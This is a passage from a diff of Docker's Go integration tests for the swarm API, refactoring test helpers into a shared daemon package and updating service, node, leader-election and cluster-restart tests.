setInstances(instances)) - // wait for tasks ready - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) - tasks = daemons[0].getServiceTasks(c, id) - // validate all tasks are NOT running on nodes[0] - for _, task := range tasks { - c.Assert(task.NodeID, checker.Not(checker.Equals), nodes[0].ID) - } - //remove service - daemons[0].removeService(c, id) - - constraints = []string{"node.labels.security==medium"} - id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) - // wait for tasks created - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances) - // let scheduler try - time.Sleep(250 * time.Millisecond) - tasks = daemons[0].getServiceTasks(c, id) - // validate tasks are not assigned - for _, task := range tasks { - c.Assert(task.NodeID, checker.Equals, "") - } - //remove service - daemons[0].removeService(c, id) - - // multiple constraints - constraints = []string{ - "node.labels.security==high", - fmt.Sprintf("node.id==%s", nodes[1].ID), - } - id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) - // wait for tasks created - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances) - // let scheduler try - time.Sleep(250 * time.Millisecond) - tasks = daemons[0].getServiceTasks(c, id) - // validate tasks are not assigned - for _, task := range tasks { - c.Assert(task.NodeID, checker.Equals, "") - } - // make nodes[1] fulfills the constraints - daemons[0].updateNode(c, nodes[1].ID, func(n *swarm.Node) { - n.Spec.Annotations.Labels = map[string]string{ - "security": "high", - } - }) - // wait for tasks ready - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) - tasks = daemons[0].getServiceTasks(c, id) - for _, task := range tasks { 
- c.Assert(task.NodeID, checker.Equals, nodes[1].ID) - } -} - -func (s *DockerSwarmSuite) TestAPISwarmServicesStateReporting(c *check.C) { - testRequires(c, SameHostDaemon) - testRequires(c, DaemonIsLinux) - - d1 := s.AddDaemon(c, true, true) - d2 := s.AddDaemon(c, true, true) - d3 := s.AddDaemon(c, true, false) - - time.Sleep(1 * time.Second) // make sure all daemons are ready to accept - - instances := 9 - d1.createService(c, simpleTestService, setInstances(instances)) - - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) - - getContainers := func() map[string]*SwarmDaemon { - m := make(map[string]*SwarmDaemon) - for _, d := range []*SwarmDaemon{d1, d2, d3} { - for _, id := range d.activeContainers() { - m[id] = d - } - } - return m - } - - containers := getContainers() - c.Assert(containers, checker.HasLen, instances) - var toRemove string - for i := range containers { - toRemove = i - } - - _, err := containers[toRemove].Cmd("stop", toRemove) - c.Assert(err, checker.IsNil) - - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) - - containers2 := getContainers() - c.Assert(containers2, checker.HasLen, instances) - for i := range containers { - if i == toRemove { - c.Assert(containers2[i], checker.IsNil) - } else { - c.Assert(containers2[i], checker.NotNil) - } - } - - containers = containers2 - for i := range containers { - toRemove = i - } - - // try with killing process outside of docker - pidStr, err := containers[toRemove].Cmd("inspect", "-f", "{{.State.Pid}}", toRemove) - c.Assert(err, checker.IsNil) - pid, err := strconv.Atoi(strings.TrimSpace(pidStr)) - c.Assert(err, checker.IsNil) - c.Assert(syscall.Kill(pid, syscall.SIGKILL), checker.IsNil) - - time.Sleep(time.Second) // 
give some time to handle the signal - - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) - - containers2 = getContainers() - c.Assert(containers2, checker.HasLen, instances) - for i := range containers { - if i == toRemove { - c.Assert(containers2[i], checker.IsNil) - } else { - c.Assert(containers2[i], checker.NotNil) - } - } + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckControlAvailable, checker.True) } func (s *DockerSwarmSuite) TestAPISwarmLeaderProxy(c *check.C) { @@ -599,20 +275,20 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaderProxy(c *check.C) { d3 := s.AddDaemon(c, true, true) // start a service by hitting each of the 3 managers - d1.createService(c, simpleTestService, func(s *swarm.Service) { + d1.CreateService(c, simpleTestService, func(s *swarm.Service) { s.Spec.Name = "test1" }) - d2.createService(c, simpleTestService, func(s *swarm.Service) { + d2.CreateService(c, simpleTestService, func(s *swarm.Service) { s.Spec.Name = "test2" }) - d3.createService(c, simpleTestService, func(s *swarm.Service) { + d3.CreateService(c, simpleTestService, func(s *swarm.Service) { s.Spec.Name = "test3" }) // 3 services should be started now, because the requests were proxied to leader // query each node and make sure it returns 3 services - for _, d := range []*SwarmDaemon{d1, d2, d3} { - services := d.listServices(c) + for _, d := range []*daemon.Daemon{d1, d2, d3} { + services := d.ListServices(c) c.Assert(services, checker.HasLen, 3) } } @@ -624,23 +300,23 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaderElection(c *check.C) { d3 := s.AddDaemon(c, true, true) // assert that the first node we made is the leader, and the other two are followers - c.Assert(d1.getNode(c, d1.NodeID).ManagerStatus.Leader, checker.True) - c.Assert(d1.getNode(c, d2.NodeID).ManagerStatus.Leader, checker.False) - c.Assert(d1.getNode(c, 
d3.NodeID).ManagerStatus.Leader, checker.False) + c.Assert(d1.GetNode(c, d1.NodeID()).ManagerStatus.Leader, checker.True) + c.Assert(d1.GetNode(c, d2.NodeID()).ManagerStatus.Leader, checker.False) + c.Assert(d1.GetNode(c, d3.NodeID()).ManagerStatus.Leader, checker.False) - d1.Stop() // stop the leader + d1.Stop(c) var ( - leader *SwarmDaemon // keep track of leader - followers []*SwarmDaemon // keep track of followers + leader *daemon.Daemon // keep track of leader + followers []*daemon.Daemon // keep track of followers ) - checkLeader := func(nodes ...*SwarmDaemon) checkF { + checkLeader := func(nodes ...*daemon.Daemon) checkF { return func(c *check.C) (interface{}, check.CommentInterface) { // clear these out before each run leader = nil followers = nil for _, d := range nodes { - if d.getNode(c, d.NodeID).ManagerStatus.Leader { + if d.GetNode(c, d.NodeID()).ManagerStatus.Leader { leader = d } else { followers = append(followers, d) @@ -651,7 +327,7 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaderElection(c *check.C) { return false, check.Commentf("no leader elected") } - return true, check.Commentf("elected %v", leader.id) + return true, check.Commentf("elected %v", leader.ID()) } } @@ -665,7 +341,7 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaderElection(c *check.C) { stableleader := leader // add the d1, the initial leader, back - d1.Start() + d1.Start(c) // TODO(stevvooe): may need to wait for rejoin here @@ -677,7 +353,7 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaderElection(c *check.C) { c.Assert(leader, checker.NotNil) c.Assert(followers, checker.HasLen, 2) // and that after we added d1 back, the leader hasn't changed - c.Assert(leader.NodeID, checker.Equals, stableleader.NodeID) + c.Assert(leader.NodeID(), checker.Equals, stableleader.NodeID()) } func (s *DockerSwarmSuite) TestAPISwarmRaftQuorum(c *check.C) { @@ -685,172 +361,58 @@ func (s *DockerSwarmSuite) TestAPISwarmRaftQuorum(c *check.C) { d2 := s.AddDaemon(c, true, true) d3 := s.AddDaemon(c, true, 
true) - d1.createService(c, simpleTestService) + d1.CreateService(c, simpleTestService) - c.Assert(d2.Stop(), checker.IsNil) + d2.Stop(c) // make sure there is a leader - waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil) + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckLeader, checker.IsNil) - d1.createService(c, simpleTestService, func(s *swarm.Service) { + d1.CreateService(c, simpleTestService, func(s *swarm.Service) { s.Spec.Name = "top1" }) - c.Assert(d3.Stop(), checker.IsNil) - - // make sure there is a leader - waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil) + d3.Stop(c) var service swarm.Service simpleTestService(&service) service.Spec.Name = "top2" - status, out, err := d1.SockRequest("POST", "/services/create", service.Spec) + cli, err := d1.NewClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError, check.Commentf("deadline exceeded", string(out))) + defer cli.Close() + + // d1 will eventually step down from leader because there is no longer an active quorum, wait for that to happen + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + _, err = cli.ServiceCreate(context.Background(), service.Spec, types.ServiceCreateOptions{}) + return err.Error(), nil + }, checker.Contains, "Make sure more than half of the managers are online.") - c.Assert(d2.Start(), checker.IsNil) + d2.Start(c) // make sure there is a leader - waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil) + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckLeader, checker.IsNil) - d1.createService(c, simpleTestService, func(s *swarm.Service) { + d1.CreateService(c, simpleTestService, func(s *swarm.Service) { s.Spec.Name = "top3" }) } -func (s *DockerSwarmSuite) TestAPISwarmListNodes(c *check.C) { - d1 := s.AddDaemon(c, true, true) - d2 := s.AddDaemon(c, true, false) - d3 := s.AddDaemon(c, true, false) 
- - nodes := d1.listNodes(c) - c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes)) - -loop0: - for _, n := range nodes { - for _, d := range []*SwarmDaemon{d1, d2, d3} { - if n.ID == d.NodeID { - continue loop0 - } - } - c.Errorf("unknown nodeID %v", n.ID) - } -} - -func (s *DockerSwarmSuite) TestAPISwarmNodeUpdate(c *check.C) { - d := s.AddDaemon(c, true, true) - - nodes := d.listNodes(c) - - d.updateNode(c, nodes[0].ID, func(n *swarm.Node) { - n.Spec.Availability = swarm.NodeAvailabilityPause - }) - - n := d.getNode(c, nodes[0].ID) - c.Assert(n.Spec.Availability, checker.Equals, swarm.NodeAvailabilityPause) -} - -func (s *DockerSwarmSuite) TestAPISwarmNodeRemove(c *check.C) { - testRequires(c, Network) - d1 := s.AddDaemon(c, true, true) - d2 := s.AddDaemon(c, true, false) - _ = s.AddDaemon(c, true, false) - - nodes := d1.listNodes(c) - c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes)) - - // Getting the info so we can take the NodeID - d2Info, err := d2.info() - c.Assert(err, checker.IsNil) - - // forceful removal of d2 should work - d1.removeNode(c, d2Info.NodeID, true) - - nodes = d1.listNodes(c) - c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes)) - - // Restart the node that was removed - err = d2.Restart() - c.Assert(err, checker.IsNil) - - // Give some time for the node to rejoin - time.Sleep(1 * time.Second) - - // Make sure the node didn't rejoin - nodes = d1.listNodes(c) - c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes)) -} - -func (s *DockerSwarmSuite) TestAPISwarmNodeDrainPause(c *check.C) { - d1 := s.AddDaemon(c, true, true) - d2 := s.AddDaemon(c, true, false) - - time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks - - // start a service, expect balanced distribution - instances := 8 - id := d1.createService(c, simpleTestService, setInstances(instances)) - - waitAndAssert(c, defaultReconciliationTimeout, 
d1.checkActiveContainerCount, checker.GreaterThan, 0) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0) - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) - - // drain d2, all containers should move to d1 - d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { - n.Spec.Availability = swarm.NodeAvailabilityDrain - }) - waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 0) - - // set d2 back to active - d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { - n.Spec.Availability = swarm.NodeAvailabilityActive - }) - - instances = 1 - d1.updateService(c, d1.getService(c, id), setInstances(instances)) - - waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) - - instances = 8 - d1.updateService(c, d1.getService(c, id), setInstances(instances)) - - // drained node first so we don't get any old containers - waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0) - waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0) - waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) - - d2ContainerCount := len(d2.activeContainers()) - - // set d2 to paused, scale service up, only d1 gets new tasks - d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { - n.Spec.Availability = swarm.NodeAvailabilityPause - }) - - instances = 14 - d1.updateService(c, d1.getService(c, id), setInstances(instances)) - - waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, 
checker.Equals, instances-d2ContainerCount) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, d2ContainerCount) - -} - func (s *DockerSwarmSuite) TestAPISwarmLeaveRemovesContainer(c *check.C) { d := s.AddDaemon(c, true, true) instances := 2 - d.createService(c, simpleTestService, setInstances(instances)) + d.CreateService(c, simpleTestService, setInstances(instances)) id, err := d.Cmd("run", "-d", "busybox", "top") c.Assert(err, checker.IsNil) id = strings.TrimSpace(id) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances+1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances+1) - c.Assert(d.Leave(false), checker.NotNil) - c.Assert(d.Leave(true), checker.IsNil) + c.Assert(d.SwarmLeave(false), checker.NotNil) + c.Assert(d.SwarmLeave(true), checker.IsNil) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) id2, err := d.Cmd("ps", "-q") c.Assert(err, checker.IsNil) @@ -867,19 +429,20 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaveOnPendingJoin(c *check.C) { c.Assert(err, checker.IsNil) id = strings.TrimSpace(id) - err = d2.Join(swarm.JoinRequest{ + c2 := d2.NewClientT(c) + err = c2.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: d2.SwarmListenAddr(), RemoteAddrs: []string{"123.123.123.123:1234"}, }) c.Assert(err, check.NotNil) c.Assert(err.Error(), checker.Contains, "Timeout was reached") - info, err := d2.info() - c.Assert(err, checker.IsNil) + info := d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStatePending) - c.Assert(d2.Leave(true), checker.IsNil) + c.Assert(d2.SwarmLeave(true), checker.IsNil) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, 
defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.Equals, 1) id2, err := d2.Cmd("ps", "-q") c.Assert(err, checker.IsNil) @@ -890,19 +453,20 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaveOnPendingJoin(c *check.C) { func (s *DockerSwarmSuite) TestAPISwarmRestoreOnPendingJoin(c *check.C) { testRequires(c, Network) d := s.AddDaemon(c, false, false) - err := d.Join(swarm.JoinRequest{ + client := d.NewClientT(c) + err := client.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: d.SwarmListenAddr(), RemoteAddrs: []string{"123.123.123.123:1234"}, }) c.Assert(err, check.NotNil) c.Assert(err.Error(), checker.Contains, "Timeout was reached") - waitAndAssert(c, defaultReconciliationTimeout, d.checkLocalNodeState, checker.Equals, swarm.LocalNodeStatePending) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckLocalNodeState, checker.Equals, swarm.LocalNodeStatePending) - c.Assert(d.Stop(), checker.IsNil) - c.Assert(d.Start(), checker.IsNil) + d.Stop(c) + d.Start(c) - info, err := d.info() - c.Assert(err, checker.IsNil) + info := d.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) } @@ -910,43 +474,43 @@ func (s *DockerSwarmSuite) TestAPISwarmManagerRestore(c *check.C) { d1 := s.AddDaemon(c, true, true) instances := 2 - id := d1.createService(c, simpleTestService, setInstances(instances)) + id := d1.CreateService(c, simpleTestService, setInstances(instances)) - d1.getService(c, id) - d1.Stop() - d1.Start() - d1.getService(c, id) + d1.GetService(c, id) + d1.Stop(c) + d1.Start(c) + d1.GetService(c, id) d2 := s.AddDaemon(c, true, true) - d2.getService(c, id) - d2.Stop() - d2.Start() - d2.getService(c, id) + d2.GetService(c, id) + d2.Stop(c) + d2.Start(c) + d2.GetService(c, id) d3 := s.AddDaemon(c, true, true) - d3.getService(c, id) - d3.Stop() - d3.Start() - d3.getService(c, id) + d3.GetService(c, id) + d3.Stop(c) + d3.Start(c) + d3.GetService(c, id) d3.Kill() time.Sleep(1 * time.Second) // time to handle 
signal - d3.Start() - d3.getService(c, id) + d3.Start(c) + d3.GetService(c, id) } func (s *DockerSwarmSuite) TestAPISwarmScaleNoRollingUpdate(c *check.C) { d := s.AddDaemon(c, true, true) instances := 2 - id := d.createService(c, simpleTestService, setInstances(instances)) + id := d.CreateService(c, simpleTestService, setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) - containers := d.activeContainers() + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances) + containers := d.ActiveContainers(c) instances = 4 - d.updateService(c, d.getService(c, id), setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) - containers2 := d.activeContainers() + d.UpdateService(c, d.GetService(c, id), setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances) + containers2 := d.ActiveContainers(c) loop0: for _, c1 := range containers { @@ -964,17 +528,17 @@ func (s *DockerSwarmSuite) TestAPISwarmInvalidAddress(c *check.C) { req := swarm.InitRequest{ ListenAddr: "", } - status, _, err := d.SockRequest("POST", "/swarm/init", req) + res, _, err := request.Post("/swarm/init", request.Host(d.Sock()), request.JSONBody(req)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) req2 := swarm.JoinRequest{ ListenAddr: "0.0.0.0:2377", RemoteAddrs: []string{""}, } - status, _, err = d.SockRequest("POST", "/swarm/join", req2) + res, _, err = request.Post("/swarm/join", request.Host(d.Sock()), request.JSONBody(req2)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) } func (s *DockerSwarmSuite) 
TestAPISwarmForceNewCluster(c *check.C) { @@ -982,35 +546,34 @@ func (s *DockerSwarmSuite) TestAPISwarmForceNewCluster(c *check.C) { d2 := s.AddDaemon(c, true, true) instances := 2 - id := d1.createService(c, simpleTestService, setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) + id := d1.CreateService(c, simpleTestService, setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount), checker.Equals, instances) // drain d2, all containers should move to d1 - d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) { n.Spec.Availability = swarm.NodeAvailabilityDrain }) - waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 0) + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.Equals, instances) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.Equals, 0) - c.Assert(d2.Stop(), checker.IsNil) + d2.Stop(c) - c.Assert(d1.Init(swarm.InitRequest{ + d1.SwarmInit(c, swarm.InitRequest{ ForceNewCluster: true, Spec: swarm.Spec{}, - }), checker.IsNil) + }) - waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances) + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckActiveContainerCount, checker.Equals, instances) d3 := s.AddDaemon(c, true, true) - info, err := d3.info() - c.Assert(err, checker.IsNil) + info := d3.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.True) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) instances = 4 - d3.updateService(c, d3.getService(c, id), setInstances(instances)) + 
d3.UpdateService(c, d3.GetService(c, id), setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances) } func simpleTestService(s *swarm.Service) { @@ -1019,7 +582,7 @@ func simpleTestService(s *swarm.Service) { s.Spec = swarm.ServiceSpec{ TaskTemplate: swarm.TaskSpec{ - ContainerSpec: swarm.ContainerSpec{ + ContainerSpec: &swarm.ContainerSpec{ Image: "busybox:latest", Command: []string{"/bin/top"}, }, @@ -1042,7 +605,7 @@ func serviceForUpdate(s *swarm.Service) { s.Spec = swarm.ServiceSpec{ TaskTemplate: swarm.TaskSpec{ - ContainerSpec: swarm.ContainerSpec{ + ContainerSpec: &swarm.ContainerSpec{ Image: "busybox:latest", Command: []string{"/bin/top"}, }, @@ -1060,11 +623,16 @@ func serviceForUpdate(s *swarm.Service) { Delay: 4 * time.Second, FailureAction: swarm.UpdateFailureActionContinue, }, + RollbackConfig: &swarm.UpdateConfig{ + Parallelism: 3, + Delay: 4 * time.Second, + FailureAction: swarm.UpdateFailureActionContinue, + }, } s.Spec.Name = "updatetest" } -func setInstances(replicas int) serviceConstructor { +func setInstances(replicas int) testdaemon.ServiceConstructor { ureplicas := uint64(replicas) return func(s *swarm.Service) { s.Spec.Mode = swarm.ServiceMode{ @@ -1075,31 +643,52 @@ func setInstances(replicas int) serviceConstructor { } } -func setImage(image string) serviceConstructor { +func setUpdateOrder(order string) testdaemon.ServiceConstructor { + return func(s *swarm.Service) { + if s.Spec.UpdateConfig == nil { + s.Spec.UpdateConfig = &swarm.UpdateConfig{} + } + s.Spec.UpdateConfig.Order = order + } +} + +func setRollbackOrder(order string) testdaemon.ServiceConstructor { return func(s *swarm.Service) { + if s.Spec.RollbackConfig == nil { + 
s.Spec.RollbackConfig = &swarm.UpdateConfig{} + } + s.Spec.RollbackConfig.Order = order + } +} + +func setImage(image string) testdaemon.ServiceConstructor { + return func(s *swarm.Service) { + if s.Spec.TaskTemplate.ContainerSpec == nil { + s.Spec.TaskTemplate.ContainerSpec = &swarm.ContainerSpec{} + } s.Spec.TaskTemplate.ContainerSpec.Image = image } } -func setFailureAction(failureAction string) serviceConstructor { +func setFailureAction(failureAction string) testdaemon.ServiceConstructor { return func(s *swarm.Service) { s.Spec.UpdateConfig.FailureAction = failureAction } } -func setMaxFailureRatio(maxFailureRatio float32) serviceConstructor { +func setMaxFailureRatio(maxFailureRatio float32) testdaemon.ServiceConstructor { return func(s *swarm.Service) { s.Spec.UpdateConfig.MaxFailureRatio = maxFailureRatio } } -func setParallelism(parallelism uint64) serviceConstructor { +func setParallelism(parallelism uint64) testdaemon.ServiceConstructor { return func(s *swarm.Service) { s.Spec.UpdateConfig.Parallelism = parallelism } } -func setConstraints(constraints []string) serviceConstructor { +func setConstraints(constraints []string) testdaemon.ServiceConstructor { return func(s *swarm.Service) { if s.Spec.TaskTemplate.Placement == nil { s.Spec.TaskTemplate.Placement = &swarm.Placement{} @@ -1108,24 +697,34 @@ func setConstraints(constraints []string) serviceConstructor { } } +func setPlacementPrefs(prefs []swarm.PlacementPreference) testdaemon.ServiceConstructor { + return func(s *swarm.Service) { + if s.Spec.TaskTemplate.Placement == nil { + s.Spec.TaskTemplate.Placement = &swarm.Placement{} + } + s.Spec.TaskTemplate.Placement.Preferences = prefs + } +} + func setGlobalMode(s *swarm.Service) { s.Spec.Mode = swarm.ServiceMode{ Global: &swarm.GlobalService{}, } } -func checkClusterHealth(c *check.C, cl []*SwarmDaemon, managerCount, workerCount int) { +func checkClusterHealth(c *check.C, cl []*daemon.Daemon, managerCount, workerCount int) { var totalMCount, 
totalWCount int for _, d := range cl { var ( info swarm.Info - err error ) // check info in a waitAndAssert, because if the cluster doesn't have a leader, `info` will return an error checkInfo := func(c *check.C) (interface{}, check.CommentInterface) { - info, err = d.info() + client := d.NewClientT(c) + daemonInfo, err := client.Info(context.Background()) + info = daemonInfo.Swarm return err, check.Commentf("cluster not ready in time") } waitAndAssert(c, defaultReconciliationTimeout, checkInfo, checker.IsNil) @@ -1138,14 +737,14 @@ func checkClusterHealth(c *check.C, cl []*SwarmDaemon, managerCount, workerCount totalMCount++ var mCount, wCount int - for _, n := range d.listNodes(c) { + for _, n := range d.ListNodes(c) { waitReady := func(c *check.C) (interface{}, check.CommentInterface) { if n.Status.State == swarm.NodeStateReady { return true, nil } - nn := d.getNode(c, n.ID) + nn := d.GetNode(c, n.ID) n = *nn - return n.Status.State == swarm.NodeStateReady, check.Commentf("state of node %s, reported by %s", n.ID, d.Info.NodeID) + return n.Status.State == swarm.NodeStateReady, check.Commentf("state of node %s, reported by %s", n.ID, d.NodeID()) } waitAndAssert(c, defaultReconciliationTimeout, waitReady, checker.True) @@ -1153,20 +752,20 @@ func checkClusterHealth(c *check.C, cl []*SwarmDaemon, managerCount, workerCount if n.Spec.Availability == swarm.NodeAvailabilityActive { return true, nil } - nn := d.getNode(c, n.ID) + nn := d.GetNode(c, n.ID) n = *nn - return n.Spec.Availability == swarm.NodeAvailabilityActive, check.Commentf("availability of node %s, reported by %s", n.ID, d.Info.NodeID) + return n.Spec.Availability == swarm.NodeAvailabilityActive, check.Commentf("availability of node %s, reported by %s", n.ID, d.NodeID()) } waitAndAssert(c, defaultReconciliationTimeout, waitActive, checker.True) if n.Spec.Role == swarm.NodeRoleManager { - c.Assert(n.ManagerStatus, checker.NotNil, check.Commentf("manager status of node %s (manager), reported by %s", n.ID, 
d.Info.NodeID)) + c.Assert(n.ManagerStatus, checker.NotNil, check.Commentf("manager status of node %s (manager), reported by %s", n.ID, d.NodeID())) if n.ManagerStatus.Leader { leaderFound = true } mCount++ } else { - c.Assert(n.ManagerStatus, checker.IsNil, check.Commentf("manager status of node %s (worker), reported by %s", n.ID, d.Info.NodeID)) + c.Assert(n.ManagerStatus, checker.IsNil, check.Commentf("manager status of node %s (worker), reported by %s", n.ID, d.NodeID())) wCount++ } } @@ -1181,11 +780,10 @@ func checkClusterHealth(c *check.C, cl []*SwarmDaemon, managerCount, workerCount func (s *DockerSwarmSuite) TestAPISwarmRestartCluster(c *check.C) { mCount, wCount := 5, 1 - var nodes []*SwarmDaemon + var nodes []*daemon.Daemon for i := 0; i < mCount; i++ { manager := s.AddDaemon(c, true, true) - info, err := manager.info() - c.Assert(err, checker.IsNil) + info := manager.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.True) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) nodes = append(nodes, manager) @@ -1193,8 +791,7 @@ func (s *DockerSwarmSuite) TestAPISwarmRestartCluster(c *check.C) { for i := 0; i < wCount; i++ { worker := s.AddDaemon(c, true, false) - info, err := worker.info() - c.Assert(err, checker.IsNil) + info := worker.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.False) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) nodes = append(nodes, worker) @@ -1207,14 +804,11 @@ func (s *DockerSwarmSuite) TestAPISwarmRestartCluster(c *check.C) { errs := make(chan error, len(nodes)) for _, d := range nodes { - go func(daemon *SwarmDaemon) { + go func(daemon *daemon.Daemon) { defer wg.Done() - if err := daemon.Stop(); err != nil { + if err := daemon.StopWithError(); err != nil { errs <- err } - if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { - daemon.root = filepath.Dir(daemon.root) - } }(d) } wg.Wait() @@ -1231,9 +825,9 @@ func (s *DockerSwarmSuite) TestAPISwarmRestartCluster(c 
*check.C) { errs := make(chan error, len(nodes)) for _, d := range nodes { - go func(daemon *SwarmDaemon) { + go func(daemon *daemon.Daemon) { defer wg.Done() - if err := daemon.Start("--iptables=false"); err != nil { + if err := daemon.StartWithError("--iptables=false"); err != nil { errs <- err } }(d) @@ -1252,116 +846,189 @@ func (s *DockerSwarmSuite) TestAPISwarmServicesUpdateWithName(c *check.C) { d := s.AddDaemon(c, true, true) instances := 2 - id := d.createService(c, simpleTestService, setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) + id := d.CreateService(c, simpleTestService, setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances) - service := d.getService(c, id) + service := d.GetService(c, id) instances = 5 setInstances(instances)(service) - url := fmt.Sprintf("/services/%s/update?version=%d", service.Spec.Name, service.Version.Index) - status, out, err := d.SockRequest("POST", url, service.Spec) + cli, err := d.NewClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + _, err = cli.ServiceUpdate(context.Background(), service.Spec.Name, service.Version, service.Spec, 